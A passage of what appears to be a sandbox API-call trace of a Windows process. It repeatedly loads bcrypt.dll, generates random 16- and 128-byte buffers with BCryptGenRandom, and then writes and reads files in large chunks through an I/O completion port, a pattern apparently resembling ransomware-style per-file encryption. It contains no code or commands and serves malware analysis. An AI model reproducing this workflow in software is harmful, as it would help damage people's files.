lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.082] CloseHandle (hObject=0x4b4) returned 1 [0091.082] free (_Block=0x3d70048) [0091.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.097] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.099] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.099] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.100] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.101] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.101] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.101] free (_Block=0x1ff1e60) [0091.101] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.101] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.101] free (_Block=0x1ff1e60) [0091.101] free (_Block=0x3db01c8) [0091.101] free (_Block=0x3db00b8) [0091.101] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.129] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.130] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.133] CloseHandle (hObject=0x4b4) returned 1 [0091.133] free (_Block=0x3d70048) [0091.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.155] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.155] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.155] free (_Block=0x1ff1e60) [0091.155] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.155] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.156] free (_Block=0x1ff1e60) [0091.156] free (_Block=0x3db01c8) [0091.156] free (_Block=0x3db00b8) [0091.156] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.198] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.199] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.202] CloseHandle (hObject=0x4b4) returned 1 [0091.202] free (_Block=0x3d70048) [0091.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.225] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.225] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.225] free (_Block=0x1ff1e60) [0091.226] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.226] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.226] free (_Block=0x1ff1e60) [0091.226] free (_Block=0x3db01c8) [0091.226] free (_Block=0x3db00b8) [0091.226] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.258] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.261] CloseHandle (hObject=0x4b4) returned 1 [0091.261] free (_Block=0x3d70048) [0091.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.306] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.306] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.306] free (_Block=0x1ff1e60) [0091.306] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.306] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.307] free (_Block=0x1ff1e60) [0091.307] free (_Block=0x3db01c8) [0091.307] free (_Block=0x3db00b8) [0091.307] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.331] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.335] CloseHandle (hObject=0x4b4) returned 1 [0091.335] free (_Block=0x3d70048) [0091.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.361] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.361] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.361] free (_Block=0x1ff1e60) [0091.361] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.361] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.361] free (_Block=0x1ff1e60) [0091.361] free (_Block=0x3db01c8) [0091.361] free (_Block=0x3db00b8) [0091.361] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.362] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.391] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.395] CloseHandle (hObject=0x4b4) returned 1 [0091.396] free (_Block=0x3d70048) [0091.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.422] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.422] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0091.423] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0091.423] free (_Block=0x1ff1e60) [0091.423] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0091.423] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0091.423] free (_Block=0x1ff1e60) [0091.423] free (_Block=0x3db01c8) [0091.423] free (_Block=0x3db00b8) [0091.423] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.424] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.425] WriteFile (in: hFile=0x4b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0091.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.787] CloseHandle (hObject=0x1194) returned 1 [0091.788] free (_Block=0x1ff1e60) [0091.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0091.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0091.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0091.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0091.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0091.819] calloc (_Count=0x40, _Size=0x4) returned 0x2071008 [0091.819] calloc (_Count=0x41, _Size=0x4) returned 0x2071110 [0091.819] free (_Block=0x2071008) [0091.819] calloc (_Count=0x41, _Size=0x4) returned 0x2071220 [0091.819] calloc (_Count=0x82, _Size=0x4) returned 0x2071330 [0091.820] free (_Block=0x2071220) [0091.820] free (_Block=0x2071330) [0091.820] free (_Block=0x2071110) [0091.820] WriteFile (in: hFile=0x1198, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0091.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.011] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0092.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0092.023] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.023] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.023] free (_Block=0x77d800) [0092.023] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.023] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.023] free (_Block=0x2071008) [0092.023] free (_Block=0x2071118) [0092.023] free (_Block=0x77d908) [0092.024] WriteFile (in: hFile=0x1194, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0092.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.027] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0092.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0092.038] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0092.038] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0092.038] free (_Block=0x77d800) [0092.038] calloc (_Count=0x41, _Size=0x4) returned 0x2071008 [0092.038] calloc (_Count=0x82, _Size=0x4) returned 0x2071118 [0092.039] free (_Block=0x2071008) [0092.039] free (_Block=0x2071118) [0092.039] free (_Block=0x77d908) [0092.039] WriteFile (in: hFile=0x11a0, lpBuffer=0x3e301cc*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198) returned 1 [0092.039] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.040] WriteFile (in: hFile=0x11a0, lpBuffer=0x3e301cc*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198) returned 1 [0092.040] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.124] ReadFile (in: hFile=0x11a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0092.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.164] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0092.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.176] ReadFile (in: hFile=0x13d8, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.178] CloseHandle (hObject=0x13d8) returned 1 [0092.178] free (_Block=0x3db00b8) [0092.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0092.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.300] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0092.303] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0092.303] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0092.303] free (_Block=0x3df0008) [0092.303] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0092.303] calloc (_Count=0x82, _Size=0x4) returned 0x2071008 [0092.304] free (_Block=0x3df0008) [0092.304] free (_Block=0x2071008) [0092.304] free (_Block=0x77d800) [0092.304] WriteFile (in: hFile=0x13dc, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0092.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.305] WriteFile (in: hFile=0x13dc, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0092.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.384] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0092.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0092.410] WriteFile (in: hFile=0x13d8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0092.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 